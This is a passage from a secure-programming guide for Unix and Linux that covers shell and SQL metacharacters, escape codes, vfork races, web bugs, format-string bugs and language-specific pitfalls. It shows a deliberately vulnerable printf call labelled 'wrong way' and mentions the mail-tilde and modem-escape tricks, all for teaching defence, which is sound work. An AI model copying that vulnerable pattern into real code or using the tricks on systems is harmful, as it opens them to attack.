    "!" also accesses the command history, which can cause real problems. In
    bash, this only occurs for interactive mode, but tcsh (a csh clone found
    in some Linux distributions) uses "!" even in scripts.

<A0><A0>*<2A>'#' is the comment character; all further text on the line is ignored.

<A0><A0>*<2A>'-' can be misinterpreted as leading an option (or, as -<2D>-, disabling all
    further options). Even if it's in the ``middle'' of a filename, if it's
    preceded by what the shell considers as whitespace you may have a
    problem.

<A0><A0>*<2A>' ' (space), '\t' (tab), '\n' (newline), '\r' (return), '\v' (vertical
    space), '\f' (form feed), and other whitespace characters can have many
    dangerous effects. They can may turn a ``single'' filename into multiple
    arguments, for example, or turn a single parameter into multiple
    parameter when stored. Newline and return have a number of additional
    dangers, for example, they can be used to create ``spoofed'' log entries
    in some programs, or inserted just before a separate command that is then
    executed (if an underlying protocol uses newlines or returns as command
    separators).

<A0><A0>*<2A>Other control characters (in particular, NIL) may cause problems for some
    shell implementations.

<A0><A0>*<2A>Depending on your usage, it's even conceivable that ``.'' (the ``run in
    current shell'') and ``='' (for setting variables) might be worrisome
    characters. However, any example I've found so far where these are issues
    have other (much worse) security problems.


What makes the shell metacharacters particularly pervasive is that several
important library calls, such as popen(3) and system(3), are implemented by
calling the command shell, meaning that they will be affected by shell
metacharacters too. Similarly, execlp(3) and execvp(3) may cause the shell to
be called. Many guidelines suggest avoiding popen(3), system(3), execlp(3),
and execvp(3) entirely and use execve(3) directly in C when trying to spawn a
process [Galvin 1998b]. At the least, avoid using system(3) when you can use
the execve(3); since system(3) uses the shell to expand characters, there is
more opportunity for mischief in system(3). In a similar manner the Perl and
shell backtick (`) also call a command shell; for more information on Perl
see Section 10.2.

Since SQL also has metacharacters, a similar issue revolves around calls to
SQL. When metacharacters are provided as input to trigger SQL metacharacters,
it's often called "SQL injection". See [http://www.spidynamics.com/papers/
SQLInjectionWhitePaper.pdf] SPI Dynamic's paper ``SQL Injection: Are your Web
Applications Vulnerable?'' for further discussion on this. As discussed in
Chapter 5, define a very limited pattern and only allow data matching that
pattern to enter; if you limit your pattern to ^[0-9]$ or ^[0-9A-Za-z]*$ then
you won't have a problem. If you must handle data that may include SQL
metacharacters, a good approach is to convert it (as early as possible) to
some other encoding before storage, e.g., HTML encoding (in which case you'll
need to encode any ampersand characters too). Also, prepend and append a
quote to all user input, even if the data is numeric; that way, insertions of
white space and other kinds of data won't be as dangerous.

Forgetting one of these characters can be disastrous, for example, many
programs omit backslash as a shell metacharacter [rfp 1999]. As discussed in
the Chapter 5, a recommended approach by some is to immediately escape at
least all of these characters when they are input. But again, by far and away
the best approach is to identify which characters you wish to permit, and use
a filter to only permit those characters.

A number of programs, especially those designed for human interaction, have
``escape'' codes that perform ``extra'' activities. One of the more common
(and dangerous) escape codes is one that brings up a command line. Make sure
that these ``escape'' commands can't be included (unless you're sure that the
specific command is safe). For example, many line-oriented mail programs
(such as mail or mailx) use tilde (~) as an escape character, which can then
be used to send a number of commands. As a result, apparently-innocent
commands such as ``mail admin < file-from-user'' can be used to execute
arbitrary programs. Interactive programs such as vi, emacs, and ed have
``escape'' mechanisms that allow users to run arbitrary shell commands from
their session. Always examine the documentation of programs you call to
search for escape mechanisms. It's best if you call only programs intended
for use by other programs; see Section 8.4.

The issue of avoiding escape codes even goes down to low-level hardware
components and emulators of them. Most modems implement the so-called
``Hayes'' command set. Unless the command set is disabled, inducing a delay,
the phrase ``+++'', and then another delay forces the modem to interpret any
following text as commands to the modem instead. This can be used to
implement denial-of-service attacks (by sending ``ATH0'', a hang-up command)
or even forcing a user to connect to someone else (a sophisticated attacker
could re-route a user's connection through a machine under the attacker's
control). For the specific case of modems, this is easy to counter (e.g., add
"ATS2-255" in the modem initialization string), but the general issue still
holds: if you're controlling a lower-level component, or an emulation of one,
make sure that you disable or otherwise handle any escape codes built into
them.

Many ``terminal'' interfaces implement the escape codes of ancient, long-gone
physical terminals like the VT100. These codes can be useful, for example,
for bolding characters, changing font color, or moving to a particular
location in a terminal interface. However, do not allow arbitrary untrusted
data to be sent directly to a terminal screen, because some of those codes
can cause serious problems. On some systems you can remap keys (e.g., so when
a user presses "Enter" or a function key it sends the command you want them
to run). On some you can even send codes to clear the screen, display a set
of commands you'd like the victim to run, and then send that set ``back'',
forcing the victim to run the commands of the attacker's choosing without
even waiting for a keystroke. This is typically implemented using ``page-mode
buffering''. This security problem is why emulated tty's (represented as
device files, usually in /dev/) should only be writeable by their owners and
never anyone else - they should never have ``other write'' permission set,
and unless only the user is a member of the group (i.e., the ``user-private
group'' scheme), the ``group write'' permission should not be set either for
the terminal [Filipski 1986]. If you're displaying data to the user at a
(simulated) terminal, you probably need to filter out all control characters
(characters with values less than 32) from data sent back to the user unless
they're identified by you as safe. Worse comes to worse, you can identify tab
and newline (and maybe carriage return) as safe, removing all the rest.
Characters with their high bits set (i.e., values greater than 127) are in
some ways trickier to handle; some old systems implement them as if they
weren't set, but simply filtering them inhibits much international use. In
this case, you need to look at the specifics of your situation.

A related problem is that the NIL character (character 0) can have surprising
effects. Most C and C++ functions assume that this character marks the end of
a string, but string-handling routines in other languages (such as Perl and
Ada95) can handle strings containing NIL. Since many libraries and kernel
calls use the C convention, the result is that what is checked is not what is
actually used [rfp 1999].

When calling another program or referring to a file always specify its full
path (e.g, /usr/bin/sort). For program calls, this will eliminate possible
errors in calling the ``wrong'' command, even if the PATH value is
incorrectly set. For other file referents, this reduces problems from ``bad''
starting directories.
-----------------------------------------------------------------------------

8.4. Call Only Interfaces Intended for Programmers

Call only application programming interfaces (APIs) that are intended for use
by programs. Usually a program can invoke any other program, including those
that are really designed for human interaction. However, it's usually unwise
to invoke a program intended for human interaction in the same way a human
would. The problem is that programs's human interfaces are intentionally rich
in functionality and are often difficult to completely control. As discussed
in Section 8.3, interactive programs often have ``escape'' codes, which might
enable an attacker to perform undesirable functions. Also, interactive
programs often try to intuit the ``most likely'' defaults; this may not be
the default you were expecting, and an attacker may find a way to exploit
this.

Examples of programs you shouldn't normally call directly include mail,
mailx, ed, vi, and emacs. At the very least, don't call these without
checking their input first.

Usually there are parameters to give you safer access to the program's
functionality, or a different API or application that's intended for use by
programs; use those instead. For example, instead of invoking a text editor
to edit some text (such as ed, vi, or emacs), use sed where you can.
-----------------------------------------------------------------------------

8.5. Check All System Call Returns

Every system call that can return an error condition must have that error
condition checked. One reason is that nearly all system calls require limited
system resources, and users can often affect resources in a variety of ways.
Setuid/setgid programs can have limits set on them through calls such as
setrlimit(3) and nice(2). External users of server programs and CGI scripts
may be able to cause resource exhaustion simply by making a large number of
simultaneous requests. If the error cannot be handled gracefully, then fail
safe as discussed earlier.
-----------------------------------------------------------------------------

8.6. Avoid Using vfork(2)

The portable way to create new processes in Unix-like systems is to use the
fork(2) call. BSD introduced a variant called vfork(2) as an optimization
technique. In vfork(2), unlike fork(2), the child borrows the parent's memory
and thread of control until a call to execve(2V) or an exit occurs; the
parent process is suspended while the child is using its resources. The
rationale is that in old BSD systems, fork(2) would actually cause memory to
be copied while vfork(2) would not. Linux never had this problem; because
Linux used copy-on-write semantics internally, Linux only copies pages when
they changed (actually, there are still some tables that have to be copied;
in most circumstances their overhead is not significant). Nevertheless, since
some programs depend on vfork(2), recently Linux implemented the BSD vfork(2)
semantics (previously vfork(2) had been an alias for fork(2)).

There are a number of problems with vfork(2). From a portability
point-of-view, the problem with vfork(2) is that it's actually fairly tricky
for a process to not interfere with its parent, especially in high-level
languages. The ``not interfering'' requirement applies to the actual machine
code generated, and many compilers generate hidden temporaries and other code
structures that cause unintended interference. The result: programs using
vfork(2) can easily fail when the code changes or even when compiler versions
change.

For secure programs it gets worse on Linux systems, because Linux (at least
2.2 versions through 2.2.17) is vulnerable to a race condition in vfork()'s
implementation. If a privileged process uses a vfork(2)/execve(2) pair in
Linux to execute user commands, there's a race condition while the child
process is already running as the user's UID, but hasn`t entered execve(2)
yet. The user may be able to send signals, including SIGSTOP, to this
process. Due to the semantics of vfork(2), the privileged parent process
would then be blocked as well. As a result, an unprivileged process could
cause the privileged process to halt, resulting in a denial-of-service of the
privileged process' service. FreeBSD and OpenBSD, at least, have code to
specifically deal with this case, so to my knowledge they are not vulnerable
to this problem. My thanks to Solar Designer, who noted and documented this
problem in Linux on the ``security-audit'' mailing list on October 7, 2000.

The bottom line with vfork(2) is simple: don't use vfork(2) in your programs.
This shouldn't be difficult; the primary use of vfork(2) is to support old
programs that needed vfork's semantics.
-----------------------------------------------------------------------------

8.7. Counter Web Bugs When Retrieving Embedded Content

Some data formats can embed references to content that is automatically
retrieved when the data is viewed (not waiting for a user to select it). If
it's possible to cause this data to be retrieved through the Internet (e.g.,
through the World Wide Wide), then there is a potential to use this
capability to obtain information about readers without the readers'
knowledge, and in some cases to force the reader to perform activities
without the reader's consent. This privacy concern is sometimes called a
``web bug.''

In a web bug, a reference is intentionally inserted into a document and used
by the content author to track who, where, and how often a document is read.
The author can also essentially watch how a ``bugged'' document is passed
from one person to another or from one organization to another.

The HTML format has had this issue for some time. According to the [http://
www.privacyfoundation.org] Privacy Foundation:


    Web bugs are used extensively today by Internet advertising companies on
    Web pages and in HTML-based email messages for tracking. They are
    typically 1-by-1 pixel in size to make them invisible on the screen to
    disguise the fact that they are used for tracking. However, they could be
    any image (using the img tag); other HTML tags that can implement web
    bugs, e.g., frames, form invocations, and scripts. By itself, invoking
    the web bug will provide the ``bugging'' site the reader IP address, the
    page that the reader visited, and various information about the browser;
    by also using cookies it's often possible to determine the specific
    identify of the reader. A survey about web bugs is available at [http://
    www.securityspace.com/s_survey/data/man.200102/webbug.html] http://
    www.securityspace.com/s_survey/data/man.200102/webbug.html.

What is more concerning is that other document formats seem to have such a
capability, too. When viewing HTML from a web site with a web browser, there
are other ways of getting information on who is browsing the data, but when
viewing a document in another format from an email few users expect that the
mere act of reading the document can be monitored. However, for many formats,
reading a document can be monitored. For example, it has been recently
determined that Microsoft Word can support web bugs; see [http://
www.privacyfoundation.org/advisories/advWordBugs.html] the Privacy Foundation
advisory for more information . As noted in their advisory, recent versions
of Microsoft Excel and Microsoft Power Point can also be bugged. In some
cases, cookies can be used to obtain even more information.

Web bugs are primarily an issue with the design of the file format. If your
users value their privacy, you probably will want to limit the automatic
downloading of included files. One exception might be when the file itself is
being downloaded (say, via a web browser); downloading other files from the
same location at the same time is much less likely to concern users.
-----------------------------------------------------------------------------

8.8. Hide Sensitive Information

Sensitive information should be hidden from prying eyes, both while being
input and output, and when stored in the system. Sensitive information
certainly includes credit card numbers, account balances, and home addresses,
and in many applications also includes names, email addressees, and other
private information.

Web-based applications should encrypt all communication with a user that
includes sensitive information; the usual way is to use the "https:" protocol
(HTTP on top of SSL or TLS). According to the HTTP 1.1 specification (IETF
RFC 2616 section 15.1.3), authors of services which use the HTTP protocol
should not use GET based forms for the submission of sensitive data, because
this will cause this data to be encoded in the Request-URI. Many existing
servers, proxies, and user agents will log the request URI in some place
where it might be visible to third parties. Instead, use POST-based
submissions, which are intended for this purpose.

Databases of such sensitive data should also be encrypted on any storage
device (such as files on a disk). Such encryption doesn't protect against an
attacker breaking the secure application, of course, since obviously the
application has to have a way to access the encrypted data too. However, it
does provide some defense against attackers who manage to get backup disks of
the data but not of the keys used to decrypt them. It also provides some
defense if an attacker doesn't manage to break into an application, but does
manage to partially break into a related system just enough to view the
stored data - again, they now have to break the encryption algorithm to get
the data. There are many circumstances where data can be transferred
unintentionally (e.g., core files), which this also prevents. It's worth
noting, however, that this is not as strong a defense as you'd think, because
often the server itself can be subverted or broken.
-----------------------------------------------------------------------------

Chapter 9. Send Information Back Judiciously

<A0>                                      Do not answer a fool according to his
                                       folly, or you will be like him
                                       yourself.
<A0>                                                         Proverbs 26:4 (NIV)
-----------------------------------------------------------------------------

9.1. Minimize Feedback

Avoid giving much information to untrusted users; simply succeed or fail, and
if it fails just say it failed and minimize information on why it failed.
Save the detailed information for audit trail logs. For example:

<A0><A0>*<2A>If your program requires some sort of user authentication (e.g., you're
    writing a network service or login program), give the user as little
    information as possible before they authenticate. In particular, avoid
    giving away the version number of your program before authentication.
    Otherwise, if a particular version of your program is found to have a
    vulnerability, then users who don't upgrade from that version advertise
    to attackers that they are vulnerable.

<A0><A0>*<2A>If your program accepts a password, don't echo it back; this creates
    another way passwords can be seen.


-----------------------------------------------------------------------------

9.2. Don't Include Comments

When returning information, don't include any ``comments'' unless you're sure
you want the receiving user to be able to view them. This is a particular
problem for web applications that generate files (such as HTML). Often web
application programmers wish to comment their work (which is fine), but
instead of simply leaving the comment in their code, the comment is included
as part of the generated file (usually HTML or XML) that is returned to the
user. The trouble is that these comments sometimes provide insight into how
the system works in a way that aids attackers.
-----------------------------------------------------------------------------

9.3. Handle Full/Unresponsive Output

It may be possible for a user to clog or make unresponsive a secure program's
output channel back to that user. For example, a web browser could be
intentionally halted or have its TCP/IP channel response slowed. The secure
program should handle such cases, in particular it should release locks
quickly (preferably before replying) so that this will not create an
opportunity for a Denial-of-Service attack. Always place time-outs on
outgoing network-oriented write requests.
-----------------------------------------------------------------------------

9.4. Control Data Formatting (Format Strings/Formatation)

A number of output routines in computer languages have a parameter that
controls the generated format. In C, the most obvious example is the printf()
family of routines (including printf(), sprintf(), snprintf(), fprintf(), and
so on). Other examples in C include syslog() (which writes system log
information) and setproctitle() (which sets the string used to display
process identifier information). Many functions with names beginning with
``err'' or ``warn'', containing ``log'' , or ending in ``printf'' are worth
considering. Python includes the "%" operation, which on strings controls
formatting in a similar manner. Many programs and libraries define formatting
functions, often by calling built-in routines and doing additional processing
(e.g., glib's g_snprintf() routine).

Format languages are essentially little programming languages - so developers
who let attackers control the format string are essentially running programs
written by attackers! Surprisingly, many people seem to forget the power of
these formatting capabilities, and use data from untrusted users as the
formatting parameter. The guideline here is clear - never use unfiltered data
from an untrusted user as the format parameter. Failing to follow this
guideline usually results in a format string vulnerability (also called a
formatation vulnerability). Perhaps this is best shown by example:
  /* Wrong way: */
  printf(string_from_untrusted_user);
  /* Right ways: */
  printf("%s", string_from_untrusted_user); /* safe */
  fputs(string_from_untrusted_user); /* better for simple strings */

If an attacker controls the formatting information, an attacker can cause all
sorts of mischief by carefully selecting the format. The case of C's printf()
is a good example - there are lots of ways to possibly exploit
user-controlled format strings in printf(). These include buffer overruns by
creating a long formatting string (this can result in the attacker having
complete control over the program), conversion specifications that use
unpassed parameters (causing unexpected data to be inserted), and creating
formats which produce totally unanticipated result values (say by prepending
or appending awkward data, causing problems in later use). A particularly
nasty case is printf's %n conversion specification, which writes the number
of characters written so far into the pointer argument; using this, an
attacker can overwrite a value that was intended for printing! An attacker
can even overwrite almost arbitrary locations, since the attacker can specify
a ``parameter'' that wasn't actually passed. The %n conversion specification
has been standard part of C since its beginning, is required by all C
standards, and is used by real programs. In 2000, Greg KH did a quick search
of source code and identified the programs BitchX (an irc client), Nedit (a
program editor), and SourceNavigator (a program editor / IDE / Debugger) as
using %n, and there are doubtless many more. Deprecating %n would probably be
a good idea, but even without %n there can be significant problems. Many
papers discuss these attacks in more detail, for example, you can see
Avoiding security holes when developing an application - Part 4: format
strings.

Since in many cases the results are sent back to the user, this attack can
also be used to expose internal information about the stack. This information
can then be used to circumvent stack protection systems such as StackGuard
and ProPolice; StackGuard uses constant ``canary'' values to detect attacks,
but if the stack's contents can be displayed, the current value of the canary
will be exposed, suddenly making the software vulnerable again to stack
smashing attacks.

A formatting string should almost always be a constant string, possibly
involving a function call to implement a lookup for internationalization
(e.g., via gettext's _()). Note that this lookup must be limited to values
that the program controls, i.e., the user must be allowed to only select from
the message files controlled by the program. It's possible to filter user
data before using it (e.g., by designing a filter listing legal characters
for the format string such as [A-Za-z0-9]), but it's usually better to simply
prevent the problem by using a constant format string or fputs() instead.
Note that although I've listed this as an ``output'' problem, this can cause
problems internally to a program before output (since the output routines may
be saving to a file, or even just generating internal state such as via
snprintf()).

The problem of input formatting causing security problems is not an idle
possibility; see CERT Advisory CA-2000-13 for an example of an exploit using
this weakness. For more information on how these problems can be exploited,
see Pascal Bouchareine's email article titled ``[Paper] Format bugs'',
published in the July 18, 2000 edition of [http://www.securityfocus.com]
Bugtraq. As of December 2000, developmental versions of the gcc compiler
support warning messages for insecure format string usages, in an attempt to
help developers avoid these problems.

Of course, this all begs the question as to whether or not the
internationalization lookup is, in fact, secure. If you're creating your own
internationalization lookup routines, make sure that an untrusted user can
only specify a legal locale and not something else like an arbitrary path.

Clearly, you want to limit the strings created through internationalization
to ones you can trust. Otherwise, an attacker could use this ability to
exploit the weaknesses in format strings, particularly in C/C++ programs.
This has been an item of discussion in Bugtraq (e.g., see John Levon's
Bugtraq post on July 26, 2000). For more information, see the discussion on
permitting users to only select legal language values in Section 5.8.3.

Although it's really a programming bug, it's worth mentioning that different
countries notate numbers in different ways, in particular, both the period
(.) and comma (,) are used to separate an integer from its fractional part.
If you save or load data, you need to make sure that the active locale does
not interfere with data handling. Otherwise, a French user may not be able to
exchange data with an English user, because the data stored and retrieved
will use different separators. I'm unaware of this being used as a security
problem, but it's conceivable.
-----------------------------------------------------------------------------

9.5. Control Character Encoding in Output

In general, a secure program must ensure that it synchronizes its clients to
any assumptions made by the secure program. One issue often impacting web
applications is that they forget to specify the character encoding of their
output. This isn't a problem if all data is from trusted sources, but if some
of the data is from untrusted sources, the untrusted source may sneak in data
that uses a different encoding than the one expected by the secure program.
This opens the door for a cross-site malicious content attack; see Section
5.10 for more information.

[http://www.cert.org/tech_tips/malicious_code_mitigation.html] CERT's tech
tip on malicious code mitigation explains the problem of unspecified
character encoding fairly well, so I quote it here:


    Many web pages leave the character encoding ("charset" parameter in HTTP)
    undefined. In earlier versions of HTML and HTTP, the character encoding
    was supposed to default to ISO-8859-1 if it wasn't defined. In fact, many
    browsers had a different default, so it was not possible to rely on the
    default being ISO-8859-1. HTML version 4 legitimizes this - if the
    character encoding isn't specified, any character encoding can be used.

    If the web server doesn't specify which character encoding is in use, it
    can't tell which characters are special. Web pages with unspecified
    character encoding work most of the time because most character sets
    assign the same characters to byte values below 128. But which of the
    values above 128 are special? Some 16-bit character-encoding schemes have
    additional multi-byte representations for special characters such as "<".
    Some browsers recognize this alternative encoding and act on it. This is
    "correct" behavior, but it makes attacks using malicious scripts much
    harder to prevent. The server simply doesn't know which byte sequences
    represent the special characters.

    For example, UTF-7 provides alternative encoding for "<" and ">", and
    several popular browsers recognize these as the start and end of a tag.
    This is not a bug in those browsers. If the character encoding really is
    UTF-7, then this is correct behavior. The problem is that it is possible
    to get into a situation in which the browser and the server disagree on
    the encoding.

Thankfully, though explaining the issue is tricky, its resolution in HTML is
easy. In the HTML header, simply specify the charset, like this example from
CERT:
<HTML>
<HEAD>
<META http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1">
<TITLE>HTML SAMPLE</TITLE>
</HEAD>
<BODY>
<P>This is a sample HTML page
</BODY>
</HTML>


From a technical standpoint, an even better approach is to set the character
encoding as part of the HTTP protocol output, though some libraries make this
more difficult. This is technically better because it doesn't force the
client to examine the header to determine a character encoding that would
enable it to read the META information in the header. Of course, in practice
a browser that couldn't read the META information given above and use it
correctly would not succeed in the marketplace, but that's a different issue.
In any case, this just means that the server would need to send as part of
the HTTP protocol, a ``charset'' with the desired value. Unfortunately, it's
hard to heartily recommend this (technically better) approach, because some
older HTTP/1.0 clients did not deal properly with an explicit charset
parameter. Although the HTTP/1.1 specification requires clients to obey the
parameter, it's suspicious enough that you probably ought to use it as an
adjunct to forcing the use of the correct character encoding, and not your
sole mechanism.
-----------------------------------------------------------------------------

9.6. Prevent Include/Configuration File Access

When developing web based applications, do not allow users to access (read)
files such as the program include and configuration files. This data may
provide enough information (e.g., passwords) to break into the system. Note
that this guideline sometimes also applies to other kinds of applications.
There are several actions you can take to do this, including:

<A0><A0>*<2A>Place the include/configuration files outside of the web documentation
    root (so that the web server will never serve the files). Really, this is
    the best approach unless there's some reason the files have to be inside
    the document root.

<A0><A0>*<2A>Configure the web server so it will not serve include files as text. For
    example, if you're using Apache, you can add a handler or an action for
    .inc files like so:
     <Files *.inc>
       Order allow,deny
       Deny from all
     </Files>

<A0><A0>*<2A>Place the include files in a protected directory (using .htaccess), and
    designate them as files that won't be served.

<A0><A0>*<2A>Use a filter to deny access to the files. For Apache, this can be done
    using:
     <Files ~ "\.phpincludes">
        Order allow,deny
        Deny from all
     </Files>
    If you need full regular expressions to match filenames, in Apache you
    could use the FilesMatch directive.

<A0><A0>*<2A>If your include file is a valid script file, which your server will
    parse, make sure that it doesn't act on user-supplied parameters and that
    it's designed to be secure.


These approaches won't protect you from users who have access to the
directories your files are in if they are world-readable. You could change
the permissions of the files so that only the uid/gid of the webserver can
read these files. However, this approach won't work if the user can get the
web server to run his own scripts (the user can just write scripts to access
your files). Fundamentally, if your site is being hosted on a server shared
with untrusted people, it's harder to secure the system. One approach is to
run multiple web serving programs, each with different permissions; this
provides more security but is painful in practice. Another approach is to set
these files to be read only by your uid/gid, and have the server run scripts
at ``your'' permission. This latter approach has its own problems: it means
that certain parts of the server must have root privileges, and that the
script may have more permissions than necessary.
-----------------------------------------------------------------------------

Chapter 10. Language-Specific Issues

<A0>                                      Undoubtedly there are all sorts of
                                       languages in the world, yet none of
                                       them is without meaning.
<A0>                                                   1 Corinthians 14:10 (NIV)

There are many language-specific security issues. Many of them can be
summarized as follows:

<A0><A0>*<2A>Turn on all relevant warnings and protection mechanisms available to you
    where practical. For compiled languages, this includes both compile-time
    mechanisms and run-time mechanisms. In general, security-relevant
    programs should compile cleanly with all warnings turned on.

<A0><A0>*<2A>If you can use a ``safe mode'' (e.g., a mode that limits the activities
    of the executable), do so. Many interpreted languages include such a
    mode. In general, don't depend on the safe mode to provide absolute
    protection; most language's safe modes have not been sufficiently
    analyzed for their security, and when they are, people usually discover
    many ways to exploit it. However, by writing your code so that it's
    secure out of safe mode, and then adding the safe mode, you end up with
    defense-in-depth (since in many cases, an attacker has to break both your
    application code and the safe mode).

<A0><A0>*<2A>Avoid dangerous and deprecated operations in the language. By
    ``dangerous'', I mean operations which are difficult to use correctly.
    For example, many languages include some mechanisms or functions that are
    ``magical'', that is, they try to infer the ``right'' thing to do using a
    heuristic - generally you should avoid them, because an attacker may be
    able to exploit the heuristic and do something dangerous instead of what
    was intended. A common error is an ``off-by-one'' error, in which the
    bound is off by one, and sometimes these result in exploitable errors. In
    general, write code in a way that minimizes the likelihood of off-by-one
    errors. If there are standard conventions in the language (e.g., for
    writing loops), use them.

<A0><A0>*<2A>Ensure that the languages' infrastructure (e.g., run-time library) is
    available and secured.

<A0><A0>*<2A>Languages that automatically garbage-collect strings should be especially
    careful to immediately erase secret data (in particular secret keys and
    passwords).

<A0><A0>*<2A>Know precisely the semantics of the operations that you are using. Look
    up each operation's semantics in its documentation. Do not ignore return
    values unless you're sure they cannot be relevant. Don't ignore the
    difference between ``signed'' and ``unsigned'' values. This is
    particularly difficult in languages which don't support exceptions, like
    C, but that's the way it goes.


-----------------------------------------------------------------------------
10.1. C/C++

It is possible to develop secure code using C or C++, but both languages
include fundamental design decisions that make it more difficult to write
secure code. C and C++ easily permit buffer overflows, force programmers to
do their own memory management, and are fairly lax in their typing systems.
For systems programs (such as an operating system kernel), C and C++ are fine
choices. For applications, C and C++ are often over-used. Strongly consider
using an even higher-level language, at least for the majority of the
application. But clearly, there are many existing programs in C and C++ which
won't get completely rewritten, and many developers may choose to develop in
C and C++.

One of the biggest security problems with C and C++ programs is buffer
overflow; see Chapter 6 for more information. C has the additional weakness
of not supporting exceptions, which makes it easy to write programs that
ignore critical error situations.

Another problem with C and C++ is that developers have to do their own memory
management (e.g., using malloc(), alloc(), free(), new, and delete), and
failing to do it correctly may result in a security flaw. The more serious
problem is that programs may erroneously free memory that should not be freed
(e.g., because it's already been freed). This can result in an immediate
crash or be exploitable, allowing an attacker to cause arbitrary code to be
executed; see [Anonymous Phrack 2001]. Some systems (such as many GNU/Linux
systems) don't protect against double-freeing at all by default, and it is
not clear that those systems which attempt to protect themselves are truly
unsubvertable. Although I haven't seen anything written on the subject, I
suspect that using the incorrect call in C++ (e.g., mixing new and malloc())
could have similar effects. For example, on March 11, 2002, it was announced
that the zlib library had this problem, affecting the many programs that use
it. Thus, when testing programs on GNU/Linux, you should set the environment
variable MALLOC_CHECK_ to 1 or 2, and you might consider executing your
program with that environment variable set with 0, 1, 2. The reason for this
variable is explained in GNU/Linux malloc(3) man page:


    Recent versions of Linux libc (later than 5.4.23) and GNU libc (2.x)
    include a malloc implementation which is tunable via environment
    variables. When MALLOC_CHECK_ is set, a special (less efficient)
    implementation is used which is designed to be tolerant against simple
    errors, such as double calls of free() with the same argument, or
    overruns of a single byte (off-by-one bugs). Not all such errors can be
    protected against, however, and memory leaks can result. If MALLOC_CHECK_
    is set to 0, any detected heap corruption is silently ignored; if set to
    1, a diagnostic is printed on stderr; if set to 2, abort() is called
    immediately. This can be useful because otherwise a crash may happen much
    later, and the true cause for the problem is then very hard to track
    down.

There are various tools to deal with this, such as Electric Fence and
Valgrind; see Section 11.7 for more information. If unused memory is not
free'd, (e.g., using free()), that unused memory may accumulate - and if
enough unused memory can accumulate, the program may stop working. As a
result, the unused memory may be exploitable by attackers to create a denial
of service. It's theoretically possible for attackers to cause memory to be
fragmented and cause a denial of service, but usually this is a fairly
impractical and low-risk attack.

Be as strict as you reasonably can when you declare types. Where you can, use
``enum'' to define enumerated values (and not just a ``char'' or ``int'' with
special values). This is particularly useful for values in switch statements,
where the compiler can be used to determine if all legal values have been
covered. Where it's appropriate, use ``unsigned'' types if the value can't be
negative.

One complication in C and C++ is that the character type ``char'' can be
signed or unsigned (depending on the compiler and machine). When a signed
char with its high bit set is saved in an integer, the result will be a
negative number; in some cases this can be exploitable. In general, use
``unsigned char'' instead of char or signed char for buffers, pointers, and
casts when dealing with character data that may have values greater than 127
(0x7f).

C and C++ are by definition rather lax in their type-checking support, but
you can at least increase their level of checking so that some mistakes can
be detected automatically. Turn on as many compiler warnings as you can and
change the code to cleanly compile with them, and strictly use ANSI
prototypes in separate header (.h) files to ensure that all function calls
use the correct types. For C or C++ compilations using gcc, use at least the
following as compilation flags (which turn on a host of warning messages) and
try to eliminate all warnings (note that -O2 is used since some warnings can
only be detected by the data flow analysis performed at higher optimization
levels):
+---------------------------------------------------------------------------+
|gcc -Wall -Wpointer-arith -Wstrict-prototypes -O2                          |
+---------------------------------------------------------------------------+
You might want ``-W -pedantic'' too.

Many C/C++ compilers can detect inaccurate format strings. For example, gcc
can warn about inaccurate format strings for functions you create if you use
its __attribute__() facility (a C extension) to mark such functions, and you
can use that facility without making your code non-portable. Here is an
example of what you'd put in your header (.h) file:
 /* in header.h */
 #ifndef __GNUC__
 #  define __attribute__(x) /*nothing*/
 #endif

 extern void logprintf(const char *format, ...)
    __attribute__((format(printf,1,2)));
 extern void logprintva(const char *format, va_list args)
    __attribute__((format(printf,1,0)));
The "format" attribute takes either "printf" or "scanf", and the numbers that
follow are the parameter number of the format string and the first variadic
parameter (respectively). The GNU docs talk about this well. Note that there
are other __attribute__ facilities as well, such as "noreturn" and "const".

Avoid common errors made by C/C++ developers. For example, be careful about
not using ``='' when you mean ``==''.
-----------------------------------------------------------------------------

10.2. Perl

Perl programmers should first read the man page perlsec(1), which describes a
number of issues involved with writing secure programs in Perl. In
particular, perlsec(1) describes the ``taint'' mode, which most secure Perl
programs should use. Taint mode is automatically enabled if the real and
effective user or group IDs differ, or you can use the -T command line flag
(use the latter if you're running on behalf of someone else, e.g., a CGI
script). Taint mode turns on various checks, such as checking path
directories to make sure they aren't writable by others.

The most obvious affect of taint mode, however, is that you may not use data
derived from outside your program to affect something else outside your
program by accident. In taint mode, all externally-obtained input is marked
as ``tainted'', including command line arguments, environment variables,
locale information (see perllocale(1)), results of certain system calls
(readdir, readlink, the gecos field of getpw* calls), and all file input.
Tainted data may not be used directly or indirectly in any command that
invokes a sub-shell, nor in any command that modifies files, directories, or
processes. There is one important exception: If you pass a list of arguments
to either system or exec, the elements of that list are NOT checked for
taintedness, so be especially careful with system or exec while in taint
mode.

Any data value derived from tainted data becomes tainted also. There is one
exception to this; the way to untaint data is to extract a substring of the
tainted data. Don't just use ``.*'' blindly as your substring, though, since
this would defeat the tainting mechanism's protections. Instead, identify
patterns that identify the ``safe'' pattern allowed by your program, and use
them to extract ``good'' values. After extracting the value, you may still
need to check it (in particular for its length).

The open, glob, and backtick functions call the shell to expand filename wild
card characters; this can be used to open security holes. You can try to
avoid these functions entirely, or use them in a less-privileged ``sandbox''
as described in perlsec(1). In particular, backticks should be rewritten
using the system() call (or even better, changed entirely to something
safer).

The perl open() function comes with, frankly, ``way too much magic'' for most
secure programs; it interprets text that, if not carefully filtered, can
create lots of security problems. Before writing code to open or lock a file,
consult the perlopentut(1) man page. In most cases, sysopen() provides a
safer (though more convoluted) approach to opening a file. The new Perl 5.6
adds an open() call with 3 parameters to turn off the magic behavior without
requiring the convolutions of sysopen().

Perl programs should turn on the warning flag (-w), which warns of
potentially dangerous or obsolete statements.

You can also run Perl programs in a restricted environment. For more
information see the ``Safe'' module in the standard Perl distribution. I'm
uncertain of the amount of auditing that this has undergone, so beware of
depending on this for security. You might also investigate the ``Penguin
Model for Secure Distributed Internet Scripting'', though at the time of this
writing the code and documentation seems to be unavailable.

Many installations include a setuid root version of perl named ``suidperl''.
However, the perldelta man page version 5.6.1 recommends using sudo instead,
stating the following:


    "Note that suidperl is neither built nor installed by default in any
    recent version of perl. Use of suidperl is highly discouraged. If you
    think you need it, try alternatives such as sudo first. See http://
    www.courtesan.com/sudo/".

-----------------------------------------------------------------------------
10.3. Python

As with any language, beware of any functions which allow data to be executed
as parts of a program, to make sure an untrusted user can't affect their
input. This includes exec(), eval(), and execfile() (and frankly, you should
check carefully any call to compile()). The input() statement is also
surprisingly dangerous. [Watters 1996, 150].

